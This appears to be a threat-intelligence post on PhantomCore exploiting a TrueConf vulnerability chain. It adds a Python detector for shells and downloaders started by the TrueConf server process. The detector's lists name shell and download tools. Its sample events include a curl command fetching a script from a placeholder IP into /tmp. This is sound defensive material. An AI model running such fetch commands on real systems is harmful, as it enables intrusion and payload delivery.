PhantomCore Exploits TrueConf Vulnerabilities in Russian Networks

Pro-Ukrainian hacktivist group PhantomCore has been targeting Russian servers running TrueConf video conferencing software since September 2025. The Hacker News, citing a report by Positive Technologies, reports that PhantomCore is using an exploit chain of three vulnerabilities that together yield remote command execution on unpatched TrueConf installations.

This isn't a spray-and-pray operation. PhantomCore is going after specific organizations, most likely Russian government or critical-infrastructure networks, where TrueConf is widely deployed. Chaining three vulnerabilities into a working exploit shows more capability than typical hacktivist activity and suggests either in-house vulnerability research or access to exploits developed elsewhere.

For defenders, the lesson is not specific to Russia: the risk of leaving collaboration software unpatched is universal, whether the server faces the internet or only the internal network. A video-conferencing server that executes attacker-supplied commands is a foothold on the network, and attackers routinely pivot from such tools to deeper access. Software that looks innocuous becomes a significant attack vector if it is not hardened and kept current.

What This Means For You

  • If your organization uses TrueConf or any similar self-hosted video conferencing solution, confirm that every instance is patched against known vulnerabilities, especially those allowing remote code execution. TrueConf servers are often exposed to facilitate external communications, making them prime targets, so restrict that exposure to what external participants actually need. Audit your network now for unauthorized access or unusual activity originating from these servers, in particular shells or download utilities started by the server process and outbound connections the server has no reason to make.

Related ATT&CK Techniques

T1190 Exploit Public-Facing Application (Initial Access), severity: critical

Detection Rules

3 detection rules were auto-generated for this incident and mapped to MITRE ATT&CK. They are distributed as Sigma YAML, convertible to Splunk SPL, Microsoft Sentinel KQL, Elastic, QRadar AQL and Wazuh. The rule previewed on the page:

PhantomCore Exploitation of TrueConf Vulnerabilities (critical, T1190 Initial Access)

Source: Shimi's Cyber World
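The Sigma rule itself is not reproduced on the page, so the following is an added example, not code from the original article, from Positive Technologies or from TrueConf. It shows the host-side check a defender would run alongside the T1190 rule and the audit advice above: scanning process-creation telemetry for a shell or download utility spawned by the TrueConf server process, which is the usual first visible step after a server-side RCE. The TrueConf process names, the field names of the events and the sample events themselves are assumptions constructed for this example; substitute the image names and schema you actually observe on your hosts.

```python
import json
from pathlib import PureWindowsPath

# ASSUMED placeholder image names for the TrueConf Server process on Windows
# and Linux. They are not vendor-documented values; replace them with the
# process names you observe on your own TrueConf hosts.
TRUECONF_PARENTS = {"trueconf_server.exe", "trueconf_server"}

# Child processes a conferencing server has no business starting.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash",
          "python", "python3", "perl"}
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe",
               "curl", "wget"}


def basename(path: str) -> str:
    """Last path component, lower-cased. PureWindowsPath splits on both
    '\\' and '/', so one helper covers Windows and Linux telemetry."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict):
    """Return a reason string if the event is a suspicious child of the
    TrueConf server process, otherwise None."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    if parent not in TRUECONF_PARENTS:
        return None
    if child in SHELLS:
        return "shell spawned by TrueConf server process (T1190 -> T1059)"
    if child in DOWNLOADERS:
        return "download utility spawned by TrueConf server process (T1190 -> T1105)"
    return None


def detect(lines):
    """Scan JSON-lines process-creation events; return one finding per hit,
    in input order. Unparseable lines are skipped rather than aborting."""
    findings = []
    for raw in lines:
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        reason = classify(event)
        if reason is None:
            continue
        findings.append({
            "host": event.get("host", "?"),
            "time": event.get("timestamp", "?"),
            "parent": event.get("parent_image", ""),
            "child": event.get("image", ""),
            "command_line": event.get("command_line", ""),
            "reason": reason,
        })
    return findings


# CONSTRUCTED sample telemetry (Sysmon Event ID 1 / auditd execve, flattened
# to JSON). Two lines are hits, one is a benign helper of the server (assumed),
# one is a shell from an unrelated parent, one is garbage a real pipeline
# would also emit. 198.51.100.0/24 is a documentation range, not a real IOC.
SAMPLE_EVENTS = [
    '{"timestamp":"2025-09-14T03:12:07Z","host":"vcs-01",'
    '"parent_image":"C:\\\\Program Files\\\\TrueConf Server\\\\trueconf_server.exe",'
    '"image":"C:\\\\Windows\\\\System32\\\\cmd.exe","command_line":"cmd.exe /c whoami"}',
    '{"timestamp":"2025-09-14T03:12:09Z","host":"vcs-01",'
    '"parent_image":"C:\\\\Program Files\\\\TrueConf Server\\\\trueconf_server.exe",'
    '"image":"C:\\\\Program Files\\\\TrueConf Server\\\\media_helper.exe","command_line":"media_helper.exe --transcode"}',
    '{"timestamp":"2025-09-14T03:13:41Z","host":"vcs-02",'
    '"parent_image":"/opt/trueconf/server/bin/trueconf_server",'
    '"image":"/usr/bin/curl","command_line":"curl -s http://198.51.100.7/s.sh -o /tmp/s.sh"}',
    '{"timestamp":"2025-09-14T03:14:00Z","host":"ws-17",'
    '"parent_image":"C:\\\\Windows\\\\explorer.exe",'
    '"image":"C:\\\\Windows\\\\System32\\\\cmd.exe","command_line":"cmd.exe"}',
    'not json at all',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']}: {f['reason']}")
        print(f"    {f['parent']} -> {f['child']}  [{f['command_line']}]")
```

The parent/child pairing is deliberately the whole rule: it fires on behaviour the exploit chain must produce to be useful, not on any detail of the three vulnerabilities, which the page does not disclose. Expect to add an allowlist for helpers your installation legitimately starts, and treat any hit on a patched server as a signal to look for a fourth, unpatched path rather than as a false positive by default.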

Indicators of Compromise

ID                      Type  Indicator
TrueConf-Exploit-Chain  RCE   TrueConf video conferencing software
TrueConf-Exploit-Chain  RCE   Exploit chain comprising three vulnerabilities

These entries describe the attack rather than atomic indicators: the page supplies no CVE identifiers, file hashes, IP addresses or domains, so nothing here can be loaded into a blocklist as-is.
